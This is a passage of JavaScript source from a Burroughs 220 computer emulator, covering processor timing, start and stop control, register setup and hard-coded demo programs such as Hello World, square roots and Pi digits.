this.delayDeltaAvg = (delayTime - this.delayRequested)*B220Processor.delayAlpha + this.delayDeltaAvg*B220Processor.delayAlpha1; this.procSlackAvg = delayTime*B220Processor.slackAlpha + this.procSlackAvg*B220Processor.slackAlpha1; } // Execute the time slice. this.runStamp = stamp; // starting clock time for time slice this.procOn(); // prepare to accumulate internal processor time this.run(); stamp = performance.now(); this.procRunAvg = (stamp - this.runStamp)*B220Processor.slackAlpha + this.procRunAvg*B220Processor.slackAlpha1; // Determine what to do next. this.runStamp = stamp; // DEBUG: for DiagMonitor use only. if (!this.RUT.value) { // Processor is stopped, just inhibit delay averaging on next call and exit. this.delayLastStamp = 0; this.procOff(); // accumulate internal processor time for the slice } else if (this.AST.value) { // Processor is idle during I/O, but still accumulating clocks, so no procOff(). this.delayLastStamp = 0; } else { this.procOff(); // accumulate internal processor time for the slice // The processor is still running, so schedule next time slice after a // throttling delay. delayTime is the number of milliseconds the // processor is running ahead of real-world time. Web browsers have a // certain minimum setTimeout() delay. If the delay is less than our // estimate of that minimum, setCallback() will yield to the event loop // but otherwise continue (real time should eventually catch up -- we // hope). If the delay is greater than the minimum, setCallback() will // reschedule us after that delay. 
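// Editorial note with a worked example (illustrative figures, not from the
// original source): if the emulated clock has advanced to execClock = 5000.0 ms
// while performance.now() reports stamp = 4992.5 ms, the emulation is running
// 7.5 ms ahead of real time, so delayTime below becomes 7.5 and the next slice
// is requested about 7.5 ms from now. A zero or negative result means the
// emulation is at or behind real time, and the slice is rescheduled as soon as
// the browser's minimum setTimeout() delay allows.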
delayTime = this.execClock - stamp; this.delayRequested = delayTime; this.delayLastStamp = stamp; this.scheduler = setCallback(this.mnemonic, this, delayTime, schedule); } }; /**************************************/ B220Processor.prototype.start = function start() { /* Initiates a time slice for the processor according to the EXT state */ var stamp = performance.now(); if (this.poweredOn && !this.RUT.value && !this.AST.value && !this.digitCheckAlarm.value && !this.ALT.value && !this.MET.value && !this.TAT.value && !this.CRT.value && !this.PAT.value && !this.HAT.value && !this.systemNotReady.value && !this.computerNotReady.value) { this.execClock = stamp; this.asyncTime = 0; this.delayLastStamp = 0; this.delayRequested = 0; this.RUT.set(1); // Start the processor timer while (this.procTimer >= 0) { this.procTimer -= stamp; } // Start the run timer while (this.runTimer >= 0) { this.runTimer -= stamp; } this.updateLampGlow(1); // freeze state in the lamps this.schedule(); } }; /**************************************/ B220Processor.prototype.stop = function stop() { /* Stops running the processor on the Javascript thread */ var stamp = performance.now(); if (this.poweredOn) { this.execLimit = 0; // kill the time slice this.SST.set(0); this.RUT.set(0); this.AST.set(0); // Stop the timers this.asyncOff(); this.procOff(); // Stop the run timer while (this.runTimer < 0) { this.runTimer += stamp; } // Stop the processor timer while (this.procTimer < 0) { this.procTimer += stamp; } this.updateLampGlow(1); // freeze state in the lamps if (this.scheduler) { clearCallback(this.scheduler); this.scheduler = 0; } } }; /**************************************/ B220Processor.prototype.step = function step() { /* Single-steps the processor. This will execute the next Fetch or Execute cycle only, then stop the processor */ if (this.poweredOn) { if (!this.RUT.value) { this.SST.set(1); this.start(); } } }; /**************************************/ B220Processor.prototype.setStop = function setStop() { /* Initiates a halt of the processor. 
The processor will execute through the end of the Execute cycle, then stop */ if (this.poweredOn) { if (this.RUT.value) { this.RUT.set(0); } else { this.stop(); } } }; /**************************************/ B220Processor.prototype.setCycle = function setCycle(cycle) { /* Sets the processor cycle to Fetch (0) or Execute (1) */ if (this.poweredOn) { if (!this.RUT.value) { this.EXT.set(cycle); } } }; /**************************************/ B220Processor.prototype.toggleCompareLamps = function toggleCompareLamps(condition) { /* Toggles the comparison lamps and sets the processor UET and HIT toggles according to the condition: <0=LOW, 0=EQUAL, >0=HIGH */ if (this.poweredOn) { if (condition < 0) { // LOW this.compareLowLamp.flip(); this.compareEqualLamp.set(0); this.compareHighLamp.set(0); this.UET.set(this.compareLowLamp.value); this.HIT.set(0); } else if (condition > 0) { // HIGH this.compareLowLamp.set(0); this.compareEqualLamp.set(0); this.compareHighLamp.flip(); this.UET.set(this.compareHighLamp.value); this.HIT.set(this.compareHighLamp.value); } else { // EQUAL this.compareLowLamp.set(0); this.compareEqualLamp.flip(); this.compareHighLamp.set(0); this.UET.set(0); this.HIT.set(this.compareEqualLamp.value); } } }; /**************************************/ B220Processor.prototype.resetRunTimer = function resetRunTimer() { /* Resets the elapsed run-time timer to zero */ if (this.poweredOn) { this.instructionCount = 0; if (this.runTimer < 0) { // it's running, adjust its bias this.runTimer = -performance.now(); } else { // it's stopped, just zero it this.runTimer = 0; } } }; /**************************************/ B220Processor.prototype.resetTransfer = function resetTransfer() { /* Initiates a Reset and Transfer operation, storing P in address 0000/04 and C in 0000/64, then branching to address 0001. 
Always active, even when running */ if (this.poweredOn) { this.digitCheckAlarm.set(0); this.ALT.set(0); this.MET.set(0); this.TAT.set(0); this.CRT.set(0); this.PAT.set(0); this.HAT.set(0); this.E.set(0x0000); this.readMemory(); this.IB.set(this.IB.value - this.IB.value % 0x100000000 + (this.C.value % 0x10000)*0x10000 + this.P.value % 0x10000); this.writeMemory(); this.P.set(0x0001); if (this.AST.value) { // I/O in progress -- cancel it this.ioComplete(true); } else { this.EXT.set(0); // set to Fetch cycle } if (!this.RUT.value) { this.start(); } } }; /**************************************/ B220Processor.prototype.tcuClear = function tcuClear() { /* Clears the Tape Control Unit */ if (this.poweredOn) { if (this.magTape) { this.magTape.clearUnit(); } } }; /**************************************/ B220Processor.prototype.powerUp = function powerUp() { /* Powers up the system */ if (!this.poweredOn) { this.clear(); this.poweredOn = 1; this.procTimer = this.runTimer = this.instructionCount = 0; this.procTime = this.procSlack = 0; this.procSlackAvg = this.procRunAvg = 0; this.delayDeltaAvg = this.delayRequested = 0; this.console = this.devices.ControlConsole; this.cardatron = this.devices.CardatronControl; this.magTape = this.devices.MagTapeControl; this.computerNotReady.set(1); // initial state after power-up this.updateLampGlow(1); } }; /**************************************/ B220Processor.prototype.powerDown = function powerDown() { /* Powers down the system */ if (this.poweredOn) { this.stop(); this.clear(); this.poweredOn = 0; this.updateLampGlow(1); this.cardatron = null; this.console = null; this.magTape = null; if (this.glowTimer) { clearInterval(this.glowTimer); this.glowTimer = null; } } }; /**************************************/ B220Processor.prototype.loadDefaultProgram = function loadDefaultProgram() { /* Loads a set of default demo programs to the memory drum */ // Simple counter speed test this.MM[ 80] = 0x0000120082; // ADD 82 this.MM[ 81] = 0x0000300080; // BUN 80 this.MM[ 82] = 0x0000000001; // CNST 1 // Hello World this.MM[ 90] = 0x0030090092; // SPO 92 this.MM[ 91] = 0x0000009999; // HLT 9999 this.MM[ 92] = 0x21648455353; // LIT R'HELL' this.MM[ 93] = 0x25600665659; // LIT 'O WOR' this.MM[ 94] = 0x25344000016; // LIT 'LD 'R // Tom Sawyer's "Square Roots 100" adapted from the 205 for the 220 (Babylonian or Newton's method): this.MM[ 100] = 0x0000100139; // CAD 139 this.MM[ 101] = 0x0000400138; // STA 138 this.MM[ 102] = 0x0000100139; // CAD 139 this.MM[ 103] = 0x0002450000; // CLR this.MM[ 104] = 0x0001480005; // SRT 5 this.MM[ 105] = 0x0000150138; // DIV 138 this.MM[ 106] = 0x0000400137; // STA 137 this.MM[ 107] = 0x0000130138; // SUB 138 this.MM[ 108] = 0x0000400136; // STA 136 this.MM[ 109] = 0x0001100136; // CAA 136 this.MM[ 110] = 0x0000180135; // CFA 135 this.MM[ 111] = 0x0001340119; // BCL 119 this.MM[ 112] = 0x0000100138; // CAD 138 this.MM[ 113] = 0x0000120137; // ADD 137 this.MM[ 114] = 0x0002450000; // CLR this.MM[ 115] = 0x0001480005; // SRT 5 this.MM[ 116] = 0x0000150134; // DIV 134 this.MM[ 117] = 0x0000400138; // STA 138 this.MM[ 118] = 0x0000300102; // BUN 102 this.MM[ 119] = 0x5011090139; // SPO 139 this.MM[ 120] = 0x5011090137; // SPO 137 this.MM[ 121] = 0x0010090132; // SPO 132 this.MM[ 122] = 0x0000100139; // CAD 139 this.MM[ 123] = 0x0000120133; // ADD 133 this.MM[ 124] = 0x0000400139; // STA 139 this.MM[ 125] = 0x0000300102; // BUN 102 this.MM[ 126] = 0; this.MM[ 127] = 0; this.MM[ 128] = 0; this.MM[ 129] = 0; this.MM[ 130] = 0; this.MM[ 131] = 0; 
this.MM[ 132] = 0x20000000016; // carraige return this.MM[ 133] = 0x100000; this.MM[ 134] = 0x200000; this.MM[ 135] = 0x10; this.MM[ 136] = 0; this.MM[ 137] = 0; this.MM[ 138] = 0; this.MM[ 139] = 0x200000; // "Square Roots 100" adapted for floating-point and relative precision: this.MM[ 200] = 0x0000100239; // CAD 239 load initial argument this.MM[ 201] = 0x0000400238; // STA 238 store as initial upper bound this.MM[ 202] = 0x0000100239; // CAD 239 start of loop: load current argument this.MM[ 203] = 0x0002450000; // CR clear R this.MM[ 204] = 0x0000250238; // FDV 238 divide argument by upper bound this.MM[ 205] = 0x0000400237; // STA 237 store as current result this.MM[ 206] = 0x0000250238; // FDV 238 ratio to upper bound this.MM[ 207] = 0x0000400236; // STA 236 store as current precision this.MM[ 208] = 0x0001100235; // CAA 235 load target precision this.MM[ 209] = 0x0000230236; // FSU 236 subtract current precision this.MM[ 210] = 0x0001330218; // BSA 218,1 if current precision > target precision this.MM[ 211] = 0x0000010000; // NOP we're done -- jump out to print this.MM[ 212] = 0x0000100238; // CAD 238 load current upper bound this.MM[ 213] = 0x0000220237; // FAD 237 add current result this.MM[ 214] = 0x0002450000; // CR clear R this.MM[ 215] = 0x0000250234; // FDV 234 divide by 2.0 to get new upper bound this.MM[ 216] = 0x0000400238; // STA 238 store new upper bound this.MM[ 217] = 0x0000300202; // BUN 202 do another iteration this.MM[ 218] = 0x8011090239; // SPO 239 this.MM[ 219] = 0x8011090237; // SPO 237 this.MM[ 220] = 0x0010090232; // SPO 232 this.MM[ 221] = 0x0000010000; // NOP this.MM[ 222] = 0x0000100239; // CAD 239 load argument value this.MM[ 223] = 0x0000220233; // FAD 233 add 1 to argument value this.MM[ 224] = 0x0000400239; // STA 239 this.MM[ 225] = 0x0000300201; // BUN 201 start sqrt for next argument value this.MM[ 226] = 0; this.MM[ 227] = 0; this.MM[ 228] = 0; this.MM[ 229] = 0; this.MM[ 230] = 0; this.MM[ 231] = 0; this.MM[ 232] = 0x20202020216; // carriage return this.MM[ 233] = 0x05110000000; // 1.0 literal: argument increment this.MM[ 234] = 0x05120000000; // 2.0 literal this.MM[ 235] = 0x05099999990; // 0.99999990 literal: target precision this.MM[ 236] = 0; // current precision this.MM[ 237] = 0; // current sqrt result this.MM[ 238] = 0; // current upper bound on result this.MM[ 239] = 0x05120000000; // 2.0 sqrt argument // Print first 800 digits of Pi; adapted from C program by Dik Winter of CWI, Amsterdam this.MM[ 300]= 0x00000100371; // CAD FLIM this.MM[ 301]= 0x00000400365; // STA C C=FLIM this.MM[ 302]= 0x00000100363; // CAD A this.MM[ 303]= 0x00001480010; // SRT 10 this.MM[ 304]= 0x00000150375; // DIV FIVE A DIV 5 this.MM[ 305]= 0x00000420365; // LDB C FOR (B=C; B>=0; --B) this.MM[ 306]= 0x10000401000; // STA - F F[B]=A DIV 5 this.MM[ 307]= 0x00001210306; // DBB *-1,1 this.MM[ 308]= 0x00000100365; // L1 CAD C START OF OUTER LOOP this.MM[ 309]= 0x00000140374; // MUL TWO this.MM[ 310]= 0x00001400368; // STR G G=C*2 this.MM[ 311]= 0x00000370362; // BFR ENDL1,00,00 IF G EQL 0, BRANCH OUT OF LOOP this.MM[ 312]= 0x00000460366; // CLL D D=0 this.MM[ 313]= 0x00000100365; // CAD C this.MM[ 314]= 0x00000400364; // STA B B=C this.MM[ 315]= 0x00000420364; // LDB B this.MM[ 316]= 0x10000101000; // DO CAD - F START OF INNER LOOP this.MM[ 317]= 0x00000140363; // MUL A F[B]*A this.MM[ 318]= 0x00001490010; // SLT 10 SHIFT PRODUCT TO RA this.MM[ 319]= 0x00000120366; // ADD D this.MM[ 320]= 0x00000400366; // STA D D+=F[B]*A this.MM[ 321]= 0x00001480010; // SRT 10 SAVE NEW 
D IN RR this.MM[ 322]= 0x00001270368; // DFL G,00,1 G-=1 this.MM[ 323]= 0x00000150368; // DIV G D DIV G this.MM[ 324]= 0x10001401000; // STR - F F[B]=D MOD G this.MM[ 325]= 0x00000400366; // STA D D=D DIV G this.MM[ 326]= 0x00001270368; // DFL G,00,1 G-=1 this.MM[ 327]= 0x00000100364; // CAD B this.MM[ 328]= 0x00000130373; // SUB ONE this.MM[ 329]= 0x00000400364; // STA B B-=1 this.MM[ 330]= 0x00000360334; // BFA ENDDO,00,00 IF B EQL 0, BRANCH OUT OF INNER LOOP this.MM[ 331]= 0x00000140366; // MUL D this.MM[ 332]= 0x00001400366; // STR D D*=B this.MM[ 333]= 0x00001210316; // DBB DO,1 DECREMENT RB, REPEAT INNER LOOP IF >= 0 this.MM[ 334]= 0x00014270365; // ENDDO DFL C,00,14 C-=14 this.MM[ 335]= 0x00000100366; // CAD D this.MM[ 336]= 0x00001480010; // SRT 10 this.MM[ 337]= 0x00000150363; // DIV A D DIV A this.MM[ 338]= 0x00000120367; // ADD E RA=E+D DIV A this.MM[ 339]= 0x00001400367; // STR E E=D MOD A // FORMAT 4 DIGITS FOR SPO OUTPUT this.MM[ 340]= 0x00001480003; // SRT 3 ISOLATE HIGH-ORDER DIGIT IN A this.MM[ 341]= 0x00000120376; // ADD N80 CONVERT 1ST DIGIT TO ALPHA this.MM[ 342]= 0x00000490001; // SLA 1 this.MM[ 343]= 0x00001490001; // SLT 1 this.MM[ 344]= 0x00000120376; // ADD N80 CONVERT 2ND DIGIT TO ALPHA this.MM[ 345]= 0x00000490001; // SLA 1 this.MM[ 346]= 0x00001490001; // SLT 1 this.MM[ 347]= 0x00000120376; // ADD N80 CONVERT 3RD DIGIT TO ALPHA this.MM[ 348]= 0x00000490001; // SLA 1 this.MM[ 349]= 0x00001490001; // SLT 1 this.MM[ 350]= 0x00000120376; // ADD N80 CONVERT 4TH DIGIT TO ALPHA this.MM[ 351]= 0x00000490002; // SLA 2 INSERT TRAILING SPACE this.MM[ 352]= 0x00002430000; // LSA 2 SET SIGN TO TWO FOR ALPHA WORD this.MM[ 353]= 0x00000400364; // STA B STORE IN WORD BUFFER this.MM[ 354]= 0x00010090364; // SPO B,1 this.MM[ 355]= 0x00405260369; // IFL COL,04,1 CHECK FOR FULL LINE ON SPO this.MM[ 356]= 0x00000100369; // CAD COL this.MM[ 357]= 0x00000180370; // CFA ECOL this.MM[ 358]= 0x00001340308; // BCL L1 IF COL < ECOL, BRANCH this.MM[ 359]= 0x00010090377; // SPO CR,1 OUTPUT NEWLINES this.MM[ 360]= 0x00000460369; // CLL COL CLEAR COLUMN COUNTER this.MM[ 361]= 0x00000300308; // BUN L1 this.MM[ 362]= 0x00000007557; // ENDL1 HLT 7557 this.MM[ 363]= 0x00000010000; // A CNST 10000 this.MM[ 364]= 0x00000000000; // B CNST 0 this.MM[ 365]= 0x00000000000; // C CNST 0 this.MM[ 366]= 0x00000000000; // D CNST 0 this.MM[ 367]= 0x00000000000; // E CNST 0 this.MM[ 368]= 0x00000000000; // G CNST 0 this.MM[ 369]= 0x00000000000; // COL CNST 0 this.MM[ 370]= 0x00000000050; // ECOL CNST 50 this.MM[ 371]= 0x00000002800; // FLIM CNST 2800 this.MM[ 372]= 0x00000000000; // ZERO CNST 0 this.MM[ 373]= 0x00000000001; // ONE CNST 1 this.MM[ 374]= 0x00000000002; // TWO CNST 2 this.MM[ 375]= 0x00000000005; // FIVE CNST 5 this.MM[ 376]= 0x00000000080; // N80 CNST 80 this.MM[ 377]= 0x20202021616; // CR CNST 20202021616 NEWLINES this.MM[1000]= 0x00000000000; // F DEFN * ARRAY F[2800] // TEMP // Tape tests this.MM[ 400] = 0x1008500000; // MRW 1 this.MM[ 401] = 0x1002580000; // MPE 1 this.MM[ 402] = 0x1000540000; // MIW 0,1,10,100 this.MM[ 403] = 0x1750540100; // MIW 100,1,7,50 this.MM[ 404] = 0x1500550079; // MIR 79,1,5,00 this.MM[ 405] = 0x1101542000; // MIW 2000,1,1,1 // write an EOT block this.MM[ 406] = 0x1008500000; // MRW 1 this.MM[ 407] = 0x1000560000; // MOW 0,1,10,100 this.MM[ 408] = 0x1750560100; // MOW 100,1,7,50 this.MM[ 409] = 0x1500570079; // MOR 79,1,5,00 //this.MM[ 410] = 0x1101562000; // MOW 2000,1,1,1 this.MM[ 410] = 0x1110562000; // MOW 2000,1,1,10 // TEMP: block-length=10, should fire EOT 
control word this.MM[ 411] = 0x1008500000; // MRW 1 this.MM[ 412] = 0x1000523000; // MRD 3000,1,10,0 this.MM[ 413] = 0x1700524000; // MRD 4000,1,7,0 this.MM[ 414] = 0x1500534350; // MRR 4350,1,5,0 this.MM[ 415] = 0x1100534800; // MRR 4800,1,1,0 // should be an EOT block this.MM[ 416] = 0x1009500000; // MDA 1 this.MM[ 417] = 0x7777009999; // HLT 9999,7777 this.MM[ 79] = 0x1900000000; // preface for 19 words, 80-98 this.MM[ 99] = 0x4000000000; // preface for 40 words, 100-139 this.MM[ 140] = 0x5800000000; // preface for 58 words, 141-198 this.MM[ 199] = 0x9900000000; // preface for 99 words, 200-298 this.MM[ 299] = 0x0000000000; // preface for 100 words, 300-399 this.MM[2000] = 0x9920012002; // end-of-tape control word this.MM[2001] = 0x9999999999; // storage for end-of-tape block state this.MM[2002] = 0x9999008421; // HLT: target for end-of-tape control branch this.MM[2003] = 0x0000300411; // branch to read test sequence };
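// ---------------------------------------------------------------------
// Editorial illustration (appended here for reference; not part of the
// original B220Processor.js). The demo words loaded above are BCD-coded
// 220 instructions, so reading a word as hex shows its decimal digits
// directly. The hypothetical helper below splits a word into the fields
// described in the file's header comment: sign digit, four control/variant
// digits, two-digit operation code, and four-digit operand address.
function decode220Word(w) {
    var addr = w % 0x10000;                               // low-order 4 digits: operand address
    var op = ((w - addr)/0x10000) % 0x100;                // next 2 digits: operation code
    var ctrl = ((w - w % 0x1000000)/0x1000000) % 0x10000; // next 4 digits: control/variant digits
    var sign = (w - w % 0x10000000000)/0x10000000000;     // high-order digit: sign digit
    return {sign: sign, control: ctrl, op: op, address: addr};
}
// Example: decode220Word(0x0000300080) returns op = 0x30 and address = 0x80,
// i.e. operation 30 (BUN) with operand address 0080, matching the "BUN 80"
// comment on the counter speed-test loop above. The fields stay BCD-coded
// numbers; use .toString(16) to display them as the 220's decimal digits.
// ---------------------------------------------------------------------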
emulator/B220Processor.js
/*********************************************************************** * retro-220/emulator B220Processor.js ************************************************************************ * Copyright (c) 2017, Paul Kimpel. * Licensed under the MIT License, see * http://www.opensource.org/licenses/mit-license.php ************************************************************************ * Burroughs 220 Emulator Processor (CPU) module. * * Instance variables in all caps generally refer to register or flip-flop (FF) * entities in the processor hardware. See the following documents: * * Burroughs 220 Operational Characteristics Manual * (Bulletin 5020A, Burroughs Corporation, revised August 1960). * Handbook of Operating Procedures for the Burroughs 220 * (Bulletin 5023, Burroughs Corporation, November 1959). * Burroughs 220 Schematics * (Technical Manual 4053-1, Burroughs Corporation, December 1958). * Datatron 220 Schematics, Section I [CPU.pdf] * (Technical Manual 4053, Burroughs Corporation, December 1958). * * available at: * http://bitsavers.org/pdf/burroughs/electrodata/220/ * * also: * * An Introduction to Coding the Burroughs 220 * (Bulletin 5019, Burroughs Corporation, December, 1958). * * Burroughs 220 word format: * 44 bits, encoded as binary-coded decimal (BCD); non-decimal codes are * invalid and cause the computer to stop with a Digit Check alarm, also known * as a Forbidden Combination (FC). * * High-order 4 bits are the "sign digit": * Low-order bit of this digit is the actual sign. * Higher-order bits are used in some I/O operations. * Remaining 40 bits are the value as: * 10 decimal digits as a fractional mantissa, with the decimal point * between the sign and high-order (10th) digits * a floating point value with the first two digits as the exponent (biased * by 50) followed by a fractional 8-digit mantissa * 5 two-digit character codes * one instruction word * * Instruction word format: * Low-order 4 digits: operand address * Next-higher 2 digits: operation code * Next-higher 4 digits: control and variant digits used by some instructions * Sign digit: odd value indicates the B register is to be added to the * operand address prior to execution. * * Processor timing is maintained internally in units of milliseconds. * ************************************************************************ * 2017-01-01 P.Kimpel * Original version, cloned from retro-205 emulator/D205Processor.js. 
***********************************************************************/ "use strict"; /**************************************/ function B220Processor(config, devices) { /* Constructor for the 220 Processor module object */ var staticLampGlow = false; // compute fractional lamp glow (experimental) this.mnemonic = "CPU"; B220Processor.instance = this; // externally-available object reference (for DiagMonitor) // Emulator control this.cardatron = null; // reference to Cardatron Control Unit this.config = config; // reference to SystemConfig object this.console = null; // reference to Control Console for I/O this.devices = devices; // hash of I/O device objects this.ioCallback = null; // current I/O interface callback function this.magTape = null; // reference to Magnetic Tape Control Unit this.poweredOn = 0; // system is powered on and initialized this.successor = null; // current delayed-action successor function this.tracing = false; // emulator diagnostic tracing flag // Memory this.memorySize = config.getNode("memorySize"); // memory size, words this.bcdMemorySize = B220Processor.binaryBCD(this.memorySize); this.MM = new Float64Array(this.memorySize); // main memory, 11-digit words this.IB = new B220Processor.Register(11*4, this, true); // memory Input Buffer // Processor throttling control and timing statistics this.asyncTime = 0; // time for processor asynchronous operation during I/O this.execClock = 0; // emulated internal processor clock, ms this.execLimit = 0; // current time slice limit on this.execClock, ms this.instructionCount = 0; // total instructions executed this.opTime = 0; // estimated time for current instruction, ms this.procTimer = 0; // elapsed time that the processor has been running, ms this.procTime = 0; // total emulated running time for processor, ms this.runStamp = 0; // timestamp of start of last time slice, ms this.runTimer = 0; // elapsed run-time timer value, ms this.scheduler = 0; // current setCallback token this.procSlack = 0; // total processor throttling delay, ms this.procSlackAvg = 0; // average slack time per time slice, ms this.procRunAvg = 0; // average elapsed time per time slice, ms this.delayDeltaAvg = 0; // average difference between requested and actual setCallback() delays, ms this.delayLastStamp = 0; // timestamp of last setCallback() delay, ms this.delayRequested = 0; // last requested setCallback() delay, ms // Primary Registers this.A = new B220Processor.Register(11*4, this, staticLampGlow); this.B = new B220Processor.Register( 4*4, this, staticLampGlow); this.C = new B220Processor.Register(10*4, this, staticLampGlow); this.D = new B220Processor.Register(11*4, this, staticLampGlow); this.E = new B220Processor.Register( 4*4, this, staticLampGlow); this.P = new B220Processor.Register( 4*4, this, staticLampGlow); this.R = new B220Processor.Register(11*4, this, staticLampGlow); this.S = new B220Processor.Register( 4*4, this, staticLampGlow); // Register E decrements modulo the system memory size, so override dec(). 
this.E.dec = function decE() { if (this.value == 0) { this.value = this.p.bcdMemorySize; } return this.constructor.prototype.dec.apply(this); }; // Control Console Lamps this.digitCheckAlarm = new B220Processor.FlipFlop(this, staticLampGlow); this.systemNotReady = new B220Processor.FlipFlop(this, staticLampGlow); this.computerNotReady = new B220Processor.FlipFlop(this, staticLampGlow); this.compareLowLamp = new B220Processor.FlipFlop(this, staticLampGlow); this.compareEqualLamp = new B220Processor.FlipFlop(this, staticLampGlow); this.compareHighLamp = new B220Processor.FlipFlop(this, staticLampGlow); // Control Console Switches this.PC1SW = 0; // program control switches 1-10 this.PC2SW = 0; this.PC3SW = 0; this.PC4SW = 0; this.PC5SW = 0; this.PC6SW = 0; this.PC7SW = 0; this.PC8SW = 0; this.PC9SW = 0; this.PC0SW = 0; this.SONSW = 0; // S "On" switch this.SUNITSSW = 0; // S units switch this.STOCSW = 0; // S to C switch this.STOPSW = 0; // S to P switch // Left-Hand Maintenance Panel Switches this.HOLDPZTZEROSW = 0; this.LEADINGZEROESSW = 0; this.PAPERTAPESUMSW = 0; this.ORDERCOMPLEMENTSW = 0; this.MEMORYLOCKOUTSW = 0; this.DCLOCKOUTSW = 0; this.SPDPHOLDSW = 0; this.HOLDSEQUENCE1SW = 0; this.HOLDSEQUENCE2SW = 0; this.HOLDSEQUENCE4SW = 0; this.HOLDSEQUENCE8SW = 0; // Left-Hand Maintenance Panel Registers & Flip-Flops this.CI = new B220Processor.Register(5, this, staticLampGlow); // carry inverters this.DC = new B220Processor.Register(6, this, staticLampGlow); // digit counter (modulo 20) this.SC = new B220Processor.Register(4, this, staticLampGlow); // sequence counter this.SI = new B220Processor.Register(4, this, staticLampGlow); // sum inverters this.X = new B220Processor.Register(4, this, staticLampGlow); // adder X (augend) input this.Y = new B220Processor.Register(4, this, staticLampGlow); // adder Y (addend) input this.Z = new B220Processor.Register(4, this, staticLampGlow); // decimal sum inverters, adder output this.CI.checkFC = B220Processor.emptyFunction; // these registers generate A-F undigits this.SI.checkFC = B220Processor.emptyFunction; this.C10 = new B220Processor.FlipFlop(this, staticLampGlow); // decimal carry toggle this.DST = new B220Processor.FlipFlop(this, staticLampGlow); // D-sign toggle this.LT1 = new B220Processor.FlipFlop(this, staticLampGlow); // logical toggle 1 this.LT2 = new B220Processor.FlipFlop(this, staticLampGlow); // logical toggle 2 this.LT3 = new B220Processor.FlipFlop(this, staticLampGlow); // logical toggle 3 this.SCI = new B220Processor.FlipFlop(this, staticLampGlow); // sequence counter inverter this.SGT = new B220Processor.FlipFlop(this, staticLampGlow); // sign toggle this.SUT = new B220Processor.FlipFlop(this, staticLampGlow); // subtract toggle this.TBT = new B220Processor.FlipFlop(this, staticLampGlow); // tape busy toggle this.TCT = new B220Processor.FlipFlop(this, staticLampGlow); // tape clock toggle this.TPT = new B220Processor.FlipFlop(this, staticLampGlow); // tape pulse toggle this.TWT = new B220Processor.FlipFlop(this, staticLampGlow); // tape write toggle // Right-Hand Maintenance Panel Switches this.MULTIPLEACCESSSW = 0; this.V1V2V3COUNTSW = 0; this.AUDIBLEALARMSW = 0; this.PCOUNTSW = 0; this.DIGITCHECKSW = 0; this.ALARMSW = 0; this.ADCOUNTSW = 0; this.IDLEALARMSW = 0; this.FREQUENCYSELECTSW = 0; this.SINGLEPULSESW = 0; this.FETCHEXECUTELOCKSW = 0; // Right-Hand Maintenance Panel Registers & Flip-Flops this.AX = new B220Processor.Register(10, this, staticLampGlow); // A exponent register this.BI = new B220Processor.Register( 8, this, 
staticLampGlow); // paper tape buffer inverters this.DX = new B220Processor.Register( 8, this, staticLampGlow); // D exponent register this.PA = new B220Processor.Register( 8, this, staticLampGlow); // PA register this.ALT = new B220Processor.FlipFlop(this, staticLampGlow); // program check alarm toggle this.AST = new B220Processor.FlipFlop(this, staticLampGlow); // asynchronous toggle this.CCT = new B220Processor.FlipFlop(this, staticLampGlow); // ?? toggle this.CRT = new B220Processor.FlipFlop(this, staticLampGlow); // Cardatron alarm toggle this.DPT = new B220Processor.FlipFlop(this, staticLampGlow); // decimal point toggle (SPO) this.EWT = new B220Processor.FlipFlop(this, staticLampGlow); // end of word toggle this.EXT = new B220Processor.FlipFlop(this, staticLampGlow); // fetch(0)/execute(1) toggle this.HAT = new B220Processor.FlipFlop(this, staticLampGlow); // high-speed printer alarm toggle this.HCT = new B220Processor.FlipFlop(this, staticLampGlow); // halt control toggle, for SOR, SOH, IOM this.HIT = new B220Processor.FlipFlop(this, staticLampGlow); // high comparison toggle this.MAT = new B220Processor.FlipFlop(this, staticLampGlow); // multiple access toggle this.MET = new B220Processor.FlipFlop(this, staticLampGlow); // memory (storage) alarm toggle this.MNT = new B220Processor.FlipFlop(this, staticLampGlow); // manual toggle this.OFT = new B220Processor.FlipFlop(this, staticLampGlow); // overflow toggle this.PAT = new B220Processor.FlipFlop(this, staticLampGlow); // paper tape alarm toggle this.PRT = new B220Processor.FlipFlop(this, staticLampGlow); // paper tape read toggle this.PZT = new B220Processor.FlipFlop(this, staticLampGlow); // paper tape zone toggle this.RPT = new B220Processor.FlipFlop(this, staticLampGlow); // repeat toggle this.RUT = new B220Processor.FlipFlop(this, staticLampGlow); // run toggle this.SST = new B220Processor.FlipFlop(this, staticLampGlow); // single-step toggle this.TAT = new B220Processor.FlipFlop(this, staticLampGlow); // magnetic tape alarm toggle this.UET = new B220Processor.FlipFlop(this, staticLampGlow); // unequal comparison toggle (HIT=UET=0 => off) // Left/Right Maintenance Panel this.leftPanelOpen = false; this.rightPanelOpen = false; // Context-bound routines this.boundConsoleOutputSign = B220Processor.prototype.consoleOutputSign.bind(this); this.boundConsoleOutputChar = B220Processor.prototype.consoleOutputChar.bind(this); this.boundConsoleOutputFinished = B220Processor.prototype.consoleOutputFinished.bind(this); this.boundConsoleInputReceiveChar = B220Processor.prototype.consoleInputReceiveChar.bind(this); this.boundConsoleInputInitiateNormal = B220Processor.prototype.consoleInputInitiateNormal.bind(this); this.boundConsoleInputInitiateInverse = B220Processor.prototype.consoleInputInitiateInverse.bind(this); this.boundCardatronOutputWord= B220Processor.prototype.cardatronOutputWord.bind(this); this.boundCardatronOutputFinished = B220Processor.prototype.cardatronOutputFinished.bind(this); this.boundCardatronReceiveWord = B220Processor.prototype.cardatronReceiveWord.bind(this); this.boundMagTapeComplete = B220Processor.prototype.magTapeComplete.bind(this); this.boundMagTapeReceiveWord = B220Processor.prototype.magTapeReceiveWord.bind(this); this.boundMagTapeSendWord = B220Processor.prototype.magTapeSendWord.bind(this); this.boundIoComplete = B220Processor.prototype.ioComplete.bind(this); this.clear(); // Create and initialize the processor state this.loadDefaultProgram(); // Preload a default program } 
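// Editorial note (illustrative, not part of the original source): register and
// memory-size values above are held in BCD, so each hex digit of a register's
// binary .value is one decimal digit of the 220 quantity it represents. For a
// hypothetical 5000-word memory configuration:
//
//     var words = 5000;                          // binary value from SystemConfig
//     var bcd = B220Processor.binaryBCD(words);  // 0x5000 -- "5000" digit for digit
//     B220Processor.bcdBinary(bcd) === words;    // true: the conversions are inverses
//
// The snippet is shown as a comment so that nothing executes before the utility
// functions defined below.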
